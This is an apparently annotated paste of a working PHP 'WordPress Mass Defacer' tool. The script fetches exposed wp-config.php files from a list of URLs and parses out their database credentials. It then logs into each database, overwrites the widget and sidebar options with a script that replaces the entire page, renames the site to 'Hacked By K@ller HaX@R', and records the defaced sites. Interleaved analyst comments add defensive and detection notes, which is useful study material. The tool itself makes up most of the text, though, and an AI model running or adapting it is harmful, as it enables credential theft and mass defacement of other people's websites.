
killer haxor

a guest
Aug 29th, 2018
  1. <?php
  2. /**
  3. * @author: K@ller HaX@R
  4. * @mail: killerhaxor@gmail.com
  5. * @Last Updated: 30 Jan 2016
  6. */
  7.  
  // Analyst note: runtime setup for a long batch run. set_time_limit(0) removes PHP's execution
  // time limit and display_errors=0 keeps PHP errors out of the page output.
  8. set_time_limit(0);
  9. ini_set('display_errors', 0);
  10.  
  // Operator-facing page head. The markup references two external hosts (fonts.googleapis.com and
  // faisalahmed.me); what role the second host plays cannot be determined from this listing.
  11. echo '<html><head>
  12. <title>WordPress Mass Defacer By K@ller HaX@R</title>
  13. <meta content="text/html; charset=utf-8">
  14. <meta name="keywords" content="WordPress Defacer, K@ller HaX@R" />
  15. <meta name="description" content="WordPress Defacer" />
  16. <meta name="author" content="K@ller HaX@R" />
  17. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  18. <link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
  19. </head><body>';
  20.  
  21. echo '<div style="font-family: Iceland;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF">WordPress Mass Defacer<br><sub>K@ller HaX@R</sub></div><br/>';
  22.  
  // Input form: posts two textareas, 'url' (labelled "Config List") and 'index' (labelled
  // "Deface"), plus a hidden action=1 field, back to this same script.
  23. echo '<form method="POST" action="" ><center><table border="1">
  24. <tr><td>Config List:</td><td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
  25. <tr><td>Deface :</td><td><textarea name="index" cols="50" rows="10" ></textarea></td></tr></table>
  26. <br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
  27.  
  // Analyst note: request handler for the form. It runs whenever a POST carries action=1; no
  // authentication or CSRF check is visible in this listing.
  28. if ($_POST['action']=='1'){
  29. if ($_POST['url']==''){
  30. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
  31. }else{
  32. $url=$_POST['url'];
  // Each line of the 'url' field is fetched over HTTP by file_get_contents2() and parsed as
  // wp-config.php source: the regexes pull DB_NAME, DB_USER, DB_PASSWORD, DB_HOST and
  // $table_prefix. Defensive takeaway: config source must never be retrievable over HTTP, and
  // database credentials that were exposed this way need rotating.
  33. $users = explode("\n",$url);
  34. foreach ($users as $user) {
  35. $user1=trim($user);
  36. $code=file_get_contents2($user1);
  37. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
  38. $db=$b1[1][0];
  39. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
  40. $user=$b2[1][0];
  41. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
  42. $db_password=$b3[1][0];
  43. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
  44. $host=$b4[1][0];
  45. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
  46. $p=$b5[1][0];
  47.  
  // Connects from the host running this script to the parsed DB_HOST with the parsed
  // credentials. mysql_* is the legacy extension removed in PHP 7.0, and '@' hides failures.
  // Limiting which client hosts the database account accepts stops the tool at this step.
  48. $d=@mysql_connect( $host, $user, $db_password ) ;
  49. if ($d){
  50. @mysql_select_db($db );
  // Payload: the posted 'index' HTML is percent-encoded by strToHex() and wrapped in a <script>
  // that overwrites document.documentElement.innerHTML. It is written to the widget_text option
  // as a PHP-serialized text widget; $ls is the declared string length, presumably reduced by 2
  // because each doubled '' collapses to one quote once MySQL parses the literal.
  // Detection: a widget_text value containing "document.documentElement.innerHTML = unescape(".
  51. $source=stripslashes($_POST['index']);
  52. $s2=strToHex(($source));
  53. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
  54. $ls=strlen($s)-2;
  55. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
  56. mysql_query($sql) ;
  // Rewrites sidebars_widgets so that sidebar-1 holds only text-2 and the stock widgets are
  // listed under wp_inactive_widgets.
  57. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
  58. mysql_query($sql) ;
  // When mb_convert_encoding() exists, blogname and blogdescription are overwritten with the
  // strings below and blog_charset is set to 'UTF-7'. $source2 is built and escaped but is not
  // used by any query in this listing.
  // Detection: blog_charset = 'UTF-7' in the options table, or the blogname string below.
  59. if (function_exists("mb_convert_encoding") )
  60. {
  61. $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
  62. $source2=mysql_real_escape_string($source2);
  63. $sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked By K@ller HaX@R' WHERE `option_name` = 'blogname';"; // Change K@ller HaX@R to your Nick
  64. @mysql_query($sql) ; ;
  65. $sql = "UPDATE `".$p."options` SET `option_value` = 'K@ller HaX@R Was Here' WHERE `option_name` = 'blogdescription';"; // Change K@ller HaX@R to your Nick
  66. @mysql_query($sql) ; ;
  67. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
  68. @mysql_query($sql) ; ;
  69. }
  // Reads the site's siteurl option and appends it to $tr, the running list of sites processed.
  70. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
  71. $siteurl=@mysql_fetch_array($aa) ;
  72. $siteurl=$siteurl['option_value'];
  73. $tr.="$siteurl\n";
  74. mysql_close();
  75. }
  76. }
  // $tr is appended to list.txt (relative path) and linked from the result page. For incident
  // response, a list.txt found next to a copy of this script is a record of the site URLs it
  // reported as changed.
  77. if ($tr)
  78. $filename = 'list.txt';
  79. $fp = fopen($filename, "a+");
  80. $write = fputs($fp, $tr);
  81. fclose($fp);
  82. echo "<div class='result'>Defacing Completed ! smile emoticon<br><br>";
  83. echo "<a href='list.txt' target='_blank'>View List of Defaced Sites</a></div><br/>";
  84. //echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
  85. }
  86. }
  87.  
  /**
   * Percent-encodes every byte of $string as "%" followed by two lowercase hex digits.
   *
   * A byte whose hex form is a single digit is left-padded with "0", so each input byte always
   * yields exactly three output characters. The request handler passes the result to a
   * JavaScript unescape() call.
   * Detection hint: content produced this way is one unbroken run of %xx escapes with no
   * literal characters in between.
   *
   * @param string $string bytes to encode
   * @return string the %xx-encoded form; empty string for empty input
   */
  88. function strToHex($string)
  89. {
  90. $hex='';
  91. for ($i=0; $i < strlen($string); $i++)
  92. {
  // dechex() does not zero-pad, so values below 0x10 need an explicit leading "0".
  93. if (strlen(dechex(ord($string[$i])))==1){
  94. $hex .="%0". dechex(ord($string[$i]));
  95. }
  96. else
  97. {
  98. $hex .="%". dechex(ord($string[$i]));
  99. }
  100. }
  101. return $hex;
  102. }
  103.  
  /**
   * Fetches the URL $u with cURL and returns the response body.
   *
   * CURLOPT_RETURNTRANSFER makes curl_exec() return the body instead of printing it (false on
   * failure), and CURLOPT_HEADER 0 leaves response headers out of the result.
   * Every request carries the fixed User-Agent string set below (note its trailing space).
   * Detection hint: that exact Firefox 12 User-Agent on requests for configuration files is a
   * searchable pattern in web server access logs.
   *
   * @param string $u URL to request
   * @return string|false response body, or false when the transfer fails
   */
  104. function file_get_contents2($u){
  105.  
  106. $ch = curl_init();
  107. curl_setopt($ch,CURLOPT_URL,$u);
  108. curl_setopt($ch, CURLOPT_HEADER, 0);
  109. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  110. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
  111. $result = curl_exec($ch);
  112. return $result ;
  113. }
  // Footer credit, emitted on every request regardless of whether the form was posted.
  114. echo "<br><br>&#169; K@ller HaX@R";
  115. ?>